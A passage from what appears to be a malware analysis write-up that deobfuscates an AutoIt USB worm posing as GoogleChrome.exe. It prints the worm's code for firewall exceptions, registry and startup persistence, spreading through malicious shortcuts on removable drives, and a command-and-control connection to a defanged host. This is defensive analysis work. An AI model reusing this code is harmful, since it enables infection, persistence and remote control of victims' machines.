class="kt">EndIf</span> </code></pre> </div> <p>It's copying the malware directory into <code>C:/GoogleChrome</code> if already not working there. Starts two copy of itself, and hides the malware directory as System file (like we found the analysis). Then exits.</p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="kt">JOBGBZLZCREXIWE</span><span class="p">()</span> <span class="p">;</span> <span class="kt">SetEnvNFirewall</span><span class="p">()</span> <span class="kt">Func</span> <span class="kt">CYNFMPPBRAWIIOK</span><span class="p">()</span> <span class="kt">EnvSet</span><span class="p">(</span><span class="s">"SEE_MASK_NOZONECHECKS"</span><span class="p">,</span> <span class="s">"1"</span><span class="p">)</span> <span class="kt">ShellExecute</span><span class="p">(</span><span class="s">"netsh"</span><span class="p">,</span> <span class="s">"firewall add allowedprogram ""C:</span><span class="err">\</span><span class="s">Program Files (x86)</span><span class="err">\</span><span class="s">AutoIt3</span><span class="err">\</span><span class="s">AutoIt3.exe"" ""GoogleChrome.exe"" ENABLE"</span><span class="p">)</span> <span class="kt">EndFunc</span> </code></pre> </div> <p>It's sets the SEE_MASK_NOZONECHECKS as <code>1</code> and adds a firewall exception for the malware and AutoIt 3 executable.</p> <p>I will alias <code>JOBGBZLZCREXIWE</code> as <code>SetEnvNFirewall</code>.</p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="kt">CYNFMPPBRAWIIOK</span><span class="p">()</span> <span class="p">;</span> <span class="kt">RegWriteAndStartupShortcuts</span><span class="p">()</span> <span class="kt">Func</span> <span class="kt">CYNFMPPBRAWIIOK</span><span class="p">()</span> <span class="kt">If</span> <span class="kt">RegRead</span><span class="p">(</span><span class="s">"HKEY_LOCAL_MACHINE</span><span class="err">\</span><span class="s">SOFTWARE</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"Google Chrome"</span><span class="p">)</span> <span class="o">&lt;&gt;</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">WindowsUpdate.lnk"</span> <span class="kt">Then</span> <span class="kt">RegWrite</span><span class="p">(</span><span class="s">"HKEY_LOCAL_MACHINE</span><span class="err">\</span><span class="s">SOFTWARE</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"Google Chrome"</span><span class="p">,</span> <span class="s">"REG_SZ"</span><span class="p">,</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">WindowsUpdate.lnk"</span><span class="p">)</span> <span class="kt">EndIf</span> <span class="kt">If</span> <span class="kt">RegRead</span><span class="p">(</span><span class="s">"HKEY_CURRENT_USER</span><span class="err">\</span><span class="s">Software</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"Google Chrome"</span><span class="p">)</span> <span class="o">&lt;&gt;</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">WindowsUpdate.lnk"</span> <span class="kt">Then</span> <span class="kt">RegWrite</span><span class="p">(</span><span class="s">"HKEY_CURRENT_USER</span><span class="err">\</span><span class="s">Software</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"Google Chrome"</span><span class="p">,</span> <span class="s">"REG_SZ"</span><span class="p">,</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">WindowsUpdate.lnk"</span><span class="p">)</span> <span class="kt">EndIf</span> <span class="kt">If</span> <span class="kt">RegRead</span><span class="p">(</span><span class="s">"HKEY_LOCAL_MACHINE</span><span class="err">\</span><span class="s">SOFTWARE</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"JavaUpdate"</span><span class="p">)</span> <span class="o">&lt;&gt;</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">WindowsUpdate.lnk"</span> <span class="kt">Then</span> <span class="kt">RegWrite</span><span class="p">(</span><span class="s">"HKEY_LOCAL_MACHINE</span><span class="err">\</span><span class="s">SOFTWARE</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"JavaUpdate"</span><span class="p">,</span> <span class="s">"REG_SZ"</span><span class="p">,</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleUpdate.lnk"</span><span class="p">)</span> <span class="kt">EndIf</span> <span class="kt">If</span> <span class="kt">RegRead</span><span class="p">(</span><span class="s">"HKEY_CURRENT_USER</span><span class="err">\</span><span class="s">Software</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"AdopeUpdate"</span><span class="p">)</span> <span class="o">&lt;&gt;</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">WindowsUpdate.lnk"</span> <span class="kt">Then</span> <span class="kt">RegWrite</span><span class="p">(</span><span class="s">"HKEY_CURRENT_USER</span><span class="err">\</span><span class="s">Software</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"AdopeUpdate"</span><span class="p">,</span> <span class="s">"REG_SZ"</span><span class="p">,</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleUpdate.lnk"</span><span class="p">)</span> <span class="kt">EndIf</span> <span class="kt">If</span> <span class="kt">RegRead</span><span class="p">(</span><span class="s">"HKEY_LOCAL_MACHINE</span><span class="err">\</span><span class="s">Software</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"NewJavaInstall"</span><span class="p">)</span> <span class="o">&lt;&gt;</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">WindowsUpdate.lnk"</span> <span class="kt">Then</span> <span class="kt">RegWrite</span><span class="p">(</span><span class="s">"HKEY_LOCAL_MACHINE</span><span class="err">\</span><span class="s">Software</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"NewJavaInstall"</span><span class="p">,</span> <span class="s">"REG_SZ"</span><span class="p">,</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleChrome.exe /AutoIt3ExecuteScript "</span> <span class="o">&amp;</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleChrome.a3x"</span><span class="p">)</span> <span class="kt">EndIf</span> <span class="kt">If</span> <span class="kt">RegRead</span><span class="p">(</span><span class="s">"HKEY_CURRENT_USER</span><span class="err">\</span><span class="s">Software</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"AdopeFlash"</span><span class="p">)</span> <span class="o">&lt;&gt;</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">WindowsUpdate.lnk"</span> <span class="kt">Then</span> <span class="kt">RegWrite</span><span class="p">(</span><span class="s">"HKEY_CURRENT_USER</span><span class="err">\</span><span class="s">Software</span><span class="err">\</span><span class="s">Microsoft</span><span class="err">\</span><span class="s">Windows</span><span class="err">\</span><span class="s">CurrentVersion</span><span class="err">\</span><span class="s">Run"</span><span class="p">,</span> <span class="s">"AdopeFlash"</span><span class="p">,</span> <span class="s">"REG_SZ"</span><span class="p">,</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleChrome.exe /AutoIt3ExecuteScript "</span> <span class="o">&amp;</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleChrome.a3x"</span><span class="p">)</span> <span class="kt">EndIf</span> <span class="kt">If</span> <span class="kt">FileExists</span><span class="p">(</span><span class="kd">@StartupCommonDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">WindowsUpdate.lnk"</span><span class="p">)</span> <span class="o">=</span> <span class="kt">False</span> <span class="kt">Then</span> <span class="kt">FileCreateShortcut</span><span class="p">(</span><span class="s">"cmd.exe"</span><span class="p">,</span> <span class="kd">@StartupCommonDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">Google Chrome.lnk"</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="s">"/c start "</span> <span class="o">&amp;</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleChrome.exe "</span> <span class="o">&amp;</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleChrome.a3x &amp; exit"</span><span class="p">)</span> <span class="kt">EndIf</span> <span class="kt">If</span> <span class="kt">FileExists</span><span class="p">(</span><span class="kd">@StartupCommonDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleUpdate.lnk"</span><span class="p">)</span> <span class="o">=</span> <span class="kt">False</span> <span class="kt">Then</span> <span class="kt">FileCreateShortcut</span><span class="p">(</span><span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleChrome.exe"</span><span class="p">,</span> <span class="kd">@StartupCommonDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleUpdate.lnk"</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="s">"/AutoIt3ExecuteScript "</span> <span class="o">&amp;</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleChrome.exe "</span> <span class="o">&amp;</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleChrome.a3x"</span><span class="p">)</span> <span class="kt">EndIf</span> <span class="kt">EndFunc</span> </code></pre> </div> <p>It's creating the <code>RegWrite</code> calls and creates start-up folder shortcuts here. However since half of checks <code>RegRead</code> and <code>FileExists</code> checks different key or path instead of that is actually changing, the conditions always fail and write or create them again when every time the function called.</p> <p>I will alias <code>CYNFMPPBRAWIIOK</code> as <code>RegWriteAndStartupShortcuts</code></p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="kt">BXTXSVPWSNIXJEB</span><span class="p">()</span> <span class="p">;</span> <span class="kt">AddScriptDirShortcuts</span><span class="p">()</span> <span class="kt">Func</span> <span class="kt">BXTXSVPWSNIXJEB</span><span class="p">()</span> <span class="kt">If</span> <span class="kt">FileExists</span><span class="p">(</span><span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">WindowsUpdate.lnk"</span><span class="p">)</span> <span class="o">=</span> <span class="kt">False</span> <span class="kt">Then</span> <span class="kt">FileCreateShortcut</span><span class="p">(</span><span class="s">"cmd.exe"</span><span class="p">,</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">WindowsUpdate.lnk"</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="s">"/c start "</span> <span class="o">&amp;</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleChrome.exe "</span> <span class="o">&amp;</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleChrome.a3x &amp; exit"</span><span class="p">)</span> <span class="kt">EndIf</span> <span class="kt">If</span> <span class="kt">FileExists</span><span class="p">(</span><span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleUpdate.lnk"</span><span class="p">)</span> <span class="o">=</span> <span class="kt">False</span> <span class="kt">Then</span> <span class="kt">FileCreateShortcut</span><span class="p">(</span><span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleChrome.exe"</span><span class="p">,</span> <span class="kd">@ScriptDir</span> <span class="o">&amp;</span> <span class="s">"</span><span class="err">\</span><span class="s">GoogleUpdate.lnk"</span><span class="p">,</span> <span class="s">""</span><span class="p">,</span> <span class="s">"/AutoIt3ExecuteScript C:</span><span class="err">\</span><span class="s">Users</span><span class="se">\r</span><span class="s">edwolf</span><span class="err">\</span><span class="s">Desktop</span><span class="err">\</span><span class="s">GoogleChrome.a3x"</span><span class="p">)</span> <span class="kt">EndIf</span> <span class="kt">EndFunc</span> </code></pre> </div> <p>It's creating GoogleChrome &amp; WindowsUpdate shortcuts for <code>@ScriptDir</code>.</p> <p>I will alias <code>BXTXSVPWSNIXJEB</code> as <code>AddScriptDirShortcuts</code></p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="kt">QHTAJWUVOFPNRCA</span><span class="p">(</span><span class="s">"ALL"</span><span class="p">)</span> <span class="p">;</span> <span class="kt">AddShortcutsNHideSystemFiles</span><span class="p">()</span> </code></pre> </div> <blockquote> <p><code>QHTAJWUVOFPNRCA($UPJTUGAXAUXFQDY = "REMOVABLE");</code></p> </blockquote> <p>Function definition is important. When the function called without parameter, it will runs for removable devices.</p> <ul> <li>It runs <code>RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", REG_DWORD, 0)</code> to hide System files hidden.</li> <li> <p><code>$VMOWJBGXRMCIZPC = DriveGetDrive($UPJTUGAXAUXFQDY)</code>, it get list of all or removable drives (dependent to <code>$UPJTUGAXAUXFQDY</code> parameter)</p> <blockquote> <p>In AutoIt 3, when a internal function returns array, mostly returns in a format like <code>[$array_size=n, $param_1, ..., $param_n]</code>. Also this rule applies to <code>DriveGetDrive</code>.</p> </blockquote> </li> <li> <p>And the function starts to iterate by using <code>$JLVHCYFDDTVCTZJ</code> variable.</p> <ul> <li> <code>$VMOWJBGXRMCIZPC[$JLVHCYFDDTVCTZJ]</code> is letter of the drive, like <code>C:</code>, <code>D:</code> etc. I will assign it to <code>$drive</code> variable to make everything more readable.</li> <li> <code>DriveStatus($drive) = "READY"</code>, checks the status of drive.</li> <li> <code>DriveSpaceFree($drive) &gt; 10</code>, And checks storage has more capacity than 10 MB.</li> <li> <code>If FileExists($drive &amp; "\MozillaFirefox") = 0 Then FileDelete($drive &amp; "\MozillaFirefox")</code>, it deletes <code>MozillaFirefox</code> folder that placed in drives root (if exist).</li> <li> <code>DirCopy(@ScriptDir, $drive &amp; "\MozillaFirefox", 1)</code>, then it copies the script folder to <code>MozillaFirefox</code> folder.</li> <li> <code>FileSetAttrib($drive &amp; "\MozillaFirefox", "+RSH")</code>, it sets <code>MozillaFirefox</code> folder as <strong>R</strong>ead-only, <strong>S</strong>ystem and <strong>H</strong>idden.</li> <li>Ands starts iterate for every file in root of drive by using <code>FileFindFirstFile</code> and <code>FileFindNextFile</code>. Iterator is <code>$QQYEAOZDVRDISHX</code> however i will call it as <code>$folder</code> for readability. <ul> <li>Checks is it folder by using <code>StringInStr(FileGetAttrib(...), "D")</code> and also checks the folder name is not equal to <code>.</code> and <code>..</code>.</li> <li>Creates two malicious shortcuts for every folder in the drive <ul> <li><code>FileCreateShortcut("cmd.exe", $drive &amp; "\" &amp; $folder &amp; "\" &amp; $folder, "", "/c start ..\MozillaFirefox\GoogleChrome.exe /AutoIt3ExecuteScript ..\MozillaFirefox\GoogleChrome.a3x explorer ChrW(4+33) &amp; ChrW(95-28) &amp; ChrW(97-29) &amp; ChrW(6+31) &amp; exit", "%windir%\system32\SHELL32.dll", "", 3, @SW_SHOWMINNOACTIVE)</code></li> <li><code>FileCreateShortcut("cmd.exe", $drive &amp; "\" &amp; $folder &amp; "\My Music", "", "/c start ..\MozillaFirefox\GoogleChrome.exe /AutoIt3ExecuteScript ..\MozillaFirefox\GoogleChrome.a3x explorer ChrW(4+33) &amp; ChrW(95-28) &amp; ChrW(97-29) &amp; ChrW(6+31) &amp; exit", "%windir%\system32\SHELL32.dll", "", 3, @SW_SHOWMINNOACTIVE)</code></li> </ul> </li> <li> <code>Sleep(40)</code>, Sleeps 40 ms. Probably for avoiding high CPU/Disk usage.</li> </ul> </li> </ul> </li> </ul> <p>It's core logic for spreading device to device. It's using removable drives as jump table, and spreads by running the shortcut file. Also that's explaining why I found the virus in a folder named as <code>MozillaFirefox</code> that placed on root of the USB.</p> <p><code>explorer ChrW(4+33) &amp; ChrW(95-28) &amp; ChrW(97-29) &amp; ChrW(6+31)</code> pattern is basically <code>explorer %CD%</code>. The patterns that given as a parameter to malware, might shows the malware was wanting to execute commands from command line parameters. However the malware don't have any mechanism for that.</p> <p>But since the command run via <code>cmd.exe</code>, the <code>&amp;</code> symbol was handled by cmd.exe and won't passed to application. So probably the malware might expected to have <code>/c start ..\MozillaFirefox\GoogleChrome.exe /AutoIt3ExecuteScript ..\MozillaFirefox\GoogleChrome.a3x &amp; explorer %cd%</code> parameter to open explorer and behave like normal folder shortcut. However those of all is just assumptions and the shortcuts are badly formatted. So they just trigger the executable.</p> <p>I will alias the <code>QHTAJWUVOFPNRCA</code> as <code>AddShortcutsNHideSystemFiles</code>.</p> <p>Also you can remember we found most of that already in static analysis section. Time is solving what we cannot find in dynamic analysis.</p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="kt">JTKCXJWJGPEWDWJ</span><span class="p">()</span> <span class="p">;</span> <span class="kt">AddMyFolders</span><span class="p">()</span> </code></pre> </div> <p>It has a lot of similar parts to <code>AddShortcutsNHideSystemFiles</code> (aka <code>QHTAJWUVOFPNRCA</code>).</p> <ul> <li> <code>$RVHWXRAJIWSBONA = DriveGetDrive("REMOVABLE")</code>, it gets a list of removable drives</li> <li> <p>And the function starts to iterate by using <code>$UYQCHVSHUXEVFXD</code> variable.</p> <ul> <li> <code>$RVHWXRAJIWSBONA[$UYQCHVSHUXEVFXD]</code> is letter of the drive, like <code>C:</code>, <code>D:</code> etc. I will assign it to <code>$drive</code> variable to make everything more readable.</li> <li> <code>DriveStatus($drive) = "READY"</code>, checks the status of drive.</li> <li> <code>DriveSpaceFree($drive) &gt; 1024</code>, And checks storage has more capacity than 1024 MB.</li> <li> <code>DirCopy(@ScriptDir, $drive &amp; "\MozillaFirefox", 1)</code>, it copies the script folder to <code>MozillaFirefox</code> folder.</li> <li> <code>FileSetAttrib($drive &amp; "\MozillaFirefox", "+RSH")</code>, it sets <code>MozillaFirefox</code> folder as <strong>R</strong>ead-only, <strong>S</strong>ystem and <strong>H</strong>idden.</li> <li>Creates two shortcuts named as <code>Documents</code> and <code>Downloads</code> to root of device. <ul> <li><code>FileCreateShortcut("cmd.exe", $drive &amp; "\Documents", "", "/c start MozillaFirefox\GoogleChrome.exe /AutoIt3ExecuteScript ..\MozillaFirefox\GoogleChrome.a3x explorer ChrW(4+33) &amp; ChrW(95-28) &amp; ChrW(97-29) &amp; ChrW(6+31) &amp; exit", "", "%windir%\system32\SHELL32.dll", "", 3, @SW_SHOWMINNOACTIVE)</code></li> <li><code>FileCreateShortcut("cmd.exe", $drive &amp; "\Downloads", "", "/c start MozillaFirefox\GoogleChrome.exe /AutoIt3ExecuteScript ..\MozillaFirefox\GoogleChrome.a3x explorer ChrW(4+33) &amp; ChrW(95-28) &amp; ChrW(97-29) &amp; ChrW(6+31) &amp; exit", "", "%windir%\system32\SHELL32.dll", "", 3, @SW_SHOWMINNOACTIVE)</code></li> </ul> </li> <li>If <code>$drive &amp; "\My Games"</code> folder not exist, it creates a directory at <code>$drive &amp; "\My Games"</code>.</li> <li>If <code>$drive &amp; "\My Pictures"</code> folder not exist, it creates a directory at <code>$drive &amp; "\My Games"</code>. There's no typo. Probably malware author forget to change folder name, it shows the <em>quality</em> of the malware.</li> <li>If <code>$drive &amp; "\My Videos"</code> folder not exist, it creates a directory at <code>$drive &amp; "\My Videos"</code>.</li> <li>If <code>$drive &amp; "\My Movies"</code> folder not exist, it creates a directory at <code>$drive &amp; "\My Movies"</code> and <code>ERQSAKPMOAIZNXP("MSG0LIONW0 Spreading !!");</code>.</li> <li>Then calls <code>AddShortcutsNHideSystemFiles</code> (aka <code>QHTAJWUVOFPNRCA</code>) (with default <code>"REMOVABLE"</code> parameter).</li> </ul> </li> </ul> <p>I will alias the <code>JTKCXJWJGPEWDWJ</code> as <code>AddMyFolders</code>.</p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="kt">Global</span> <span class="n">$YLZDSLGVNMGLHEL</span> <span class="o">=</span> <span class="s">"googleads[.]publicvm[.]com"</span> <span class="kt">Global</span> <span class="n">$TMDVEICCZCVSTZO</span> <span class="o">=</span> <span class="mi">224</span> <span class="kt">Global</span> <span class="n">$JDSQSBWWYOBBUNS</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span> <span class="p">;</span> <span class="n">$TCP_Socket</span> <span class="kt">Global</span> <span class="n">$VLKUJUBFNIMZXZY</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="p">;</span> <span class="n">$TCP_Connection_State</span> <span class="kt">Func</span> <span class="kt">FGHHVXEASQLUIKK</span><span class="p">()</span> <span class="p">;</span> <span class="kt">ResolveAddressAndConnect</span><span class="p">()</span> <span class="n">$VLKUJUBFNIMZXZY</span> <span class="o">=</span> <span class="mi">0</span> <span class="kt">TCPCloseSocket</span><span class="p">(</span><span class="n">$JDSQSBWWYOBBUNS</span><span class="p">)</span> <span class="kt">TCPShutdown</span><span class="p">()</span> <span class="kt">TCPStartup</span><span class="p">()</span> <span class="n">$JDSQSBWWYOBBUNS</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span> <span class="n">$JDSQSBWWYOBBUNS</span> <span class="o">=</span> <span class="kt">TCPConnect</span><span class="p">(</span><span class="kt">TCPNameToIP</span><span class="p">(</span><span class="n">$YLZDSLGVNMGLHEL</span><span class="p">),</span> <span class="n">$TMDVEICCZCVSTZO</span><span class="p">)</span> <span class="n">$VLKUJUBFNIMZXZY</span> <span class="o">=</span> <span class="mi">0</span> <span class="kt">EndFunc</span> </code></pre> </div> <p>It tries to connect C&amp;C server here like we find at dynamic analysis.</p> <p>I will alias <code>$JDSQSBWWYOBBUNS</code> as <code>$TCP_Socket</code> and <code>$VLKUJUBFNIMZXZY</code> as <code>$TCP_Connection_State</code> for readability. And alias the function <code>FGHHVXEASQLUIKK</code> as <code>ResolveAddressAndConnect</code>.</p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="kt">Func</span> <span class="kt">ERQSAKPMOAIZNXP</span><span class="p">(</span><span class="n">$OPGATNEJQLBURNA</span><span class="p">)</span> <span class="p">;</span> <span class="kt">DataReport</span><span class="p">(</span><span class="n">$data</span><span class="p">)</span> <span class="n">$OPGATNEJQLBURNA</span> <span class="o">=</span> <span class="kt">StringReplace</span><span class="p">(</span><span class="n">$OPGATNEJQLBURNA</span><span class="p">,</span> <span class="kd">@CRLF</span><span class="p">,</span> <span class="s">"|"</span><span class="p">)</span> <span class="kt">TCPSend</span><span class="p">(</span><span class="n">$TCP_Socket</span><span class="p">,</span> <span class="n">$OPGATNEJQLBURNA</span> <span class="o">&amp;</span> <span class="kd">@CRLF</span><span class="p">)</span> <span class="kt">If</span> <span class="kd">@error</span> <span class="kt">Then</span> <span class="n">$TCP_Connection_State</span> <span class="o">=</span> <span class="mi">1</span> <span class="kt">Return</span> <span class="mi">0</span> <span class="kt">Else</span> <span class="kt">Return</span> <span class="mi">1</span> <span class="kt">EndIf</span> <span class="kt">EndFunc</span> </code></pre> </div> <p>It's a data reporter function to C&amp;C server, it gets the <code>$OPGATNEJQLBURNA</code> parameter and replaces CRLF with <code>"|"</code> and sends via the socket.</p> <p>I will alias the function <code>ERQSAKPMOAIZNXP</code> as <code>DataReport</code>.</p> <p>And we have learned what happens by <code>ERQSAKPMOAIZNXP("MSG0LIONW0 Spreading !!");</code> function call. When the virus infects a new removable drive, it calls home and reports that.</p> <p>And fun fact, <code>ERQSAKPMOAIZNXP("MSG0LIONW0 Spreading !!");</code> can be run before the socket opening. If you boot your computer with removable device attached or first run of the malware, <code>AddMyFolders</code> will be run before first <code>ResolveAddressAndConnect</code> call. So, it will always fail in those situations.</p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="kt">Func</span> <span class="kt">RKCGDIKLHXBSMSW</span><span class="p">()</span> <span class="p">;</span> <span class="kt">GetCommandFromCNC</span><span class="p">()</span> <span class="kt">If</span> <span class="n">$TCP_Socket</span> <span class="o">&lt;</span> <span class="mi">1</span> <span class="kt">Then</span> <span class="n">$TCP_Connection_State</span> <span class="o">=</span> <span class="mi">1</span> <span class="kt">Return</span> <span class="o">-</span><span class="mi">1</span> <span class="kt">EndIf</span> <span class="n">$TWZCNPRQZYRMAHS</span> <span class="o">=</span> <span class="kt">TCPRecv</span><span class="p">(</span><span class="n">$TCP_Socket</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="kt">If</span> <span class="kd">@error</span> <span class="kt">Then</span> <span class="n">$TCP_Connection_State</span> <span class="o">=</span> <span class="mi">1</span> <span class="kt">Return</span> <span class="o">-</span><span class="mi">1</span> <span class="kt">EndIf</span> <span class="p">;</span> <span class="kt">Dead</span> <span class="n">code</span> <span class="n">elimination</span><span class="p">,</span> <span class="kd">some</span> <span class="n">concat</span> <span class="n">and</span> <span class="n">string</span> <span class="n">operations</span> <span class="n">however</span> <span class="k">none</span> <span class="n">of</span> <span class="n">them</span> <span class="n">used</span> <span class="n">really</span> <span class="kt">If</span> <span class="kt">StringInStr</span><span class="p">(</span><span class="n">$TWZCNPRQZYRMAHS</span><span class="p">,</span> <span class="kd">@CRLF</span><span class="p">)</span> <span class="kt">Then</span> <span class="kt">Return</span> <span class="n">$TWZCNPRQZYRMAHS</span> <span class="kt">EndIf</span> <span class="kt">Return</span> <span class="s">""</span> <span class="kt">EndFunc</span> </code></pre> </div> <p>It's basically checks socket and receive command from C&amp;C server. If the answer <code>$TWZCNPRQZYRMAHS</code> has <code>@CRLF</code> in it, returns with the answer. If not, returns with <code>""</code>. And you should notice, if it encounter with an error, returns with <code>-1</code>.</p> <p>I will alias the function <code>RKCGDIKLHXBSMSW</code> as <code>GetCommandFromCNC</code>.</p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="kt">If</span> <span class="nf">_Singleton</span><span class="p">(</span><span class="s">"GoogleChrome.exe"</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span> <span class="kt">Then</span> <span class="kt">Exit</span> <span class="kt">EndIf</span> </code></pre> </div> <p>And it uses singleton here, probably prevent starting multiple instance and opening multiple socket with C&amp;C server.</p> <div class="highlight js-code-highlight"> <pre class="highlight swift"><code><span class="kt">Func</span> <span class="kt">AV</span><span class="p">()</span> <span class="p">;</span> <span class="kt">The</span> <span class="n">only</span> <span class="n">function</span> <span class="n">that</span> <span class="kt">I</span> <span class="n">will</span> <span class="n">not</span> <span class="n">alias</span> <span class="n">to</span> <span class="n">something</span> <span class="n">probably</span> <span class="k">in</span> <span class="n">this</span> <span class="kt">Writeup</span> <span class="kt">Local</span> <span class="n">$AVNAME</span> <span class="kt">If</span> <span class="kd">@OSVersion</span> <span class="o">=</span> <span class="s">"WIN_XP"</span> <span class="kt">Then</span> <span class="n">$OWMI</span> <span class="o">=</span> <span class="kt">ObjGet</span><span class="p">(</span><span class="s">"winmgmts:</span><span class="se">\\</span><span class="s">localhost</span><span class="se">\r</span><span class="s">oot</span><span class="err">\</span><span class="s">SecurityCenter"</span><span class="p">)</span> <span class="kt">Else</span> <span class="n">$OWMI</span> <span class="o">=</span> <span class="kt">ObjGet</span><span class="p">(</span><span class="s">"winmgmts:</span><span class="se">\\</span><span class="s">localhost</span><span class="se">\r</span><span class="s">oot</span><span class="err">\</span><span class="s">SecurityCenter2"</span><span class="p">)</span> <span class="kt">EndIf</span> <span class="n">$COLITEMS</span> <span class="o">=</span> <span class="n">$OWMI</span><span class="o">.</span><span class="kt">ExecQuery</span><span class="p">(</span><span class="s">"Select * from AntiVirusProduct"</span><span class="p">)</span> <span class="kt">For</span> <span class="n">$OBJANTIVIRUSPRODUCT</span> <span class="kt">In</span> <span class="n">$COLITEMS</span> <span class="n">$AVNAME</span> <span class="o">=</span> <span 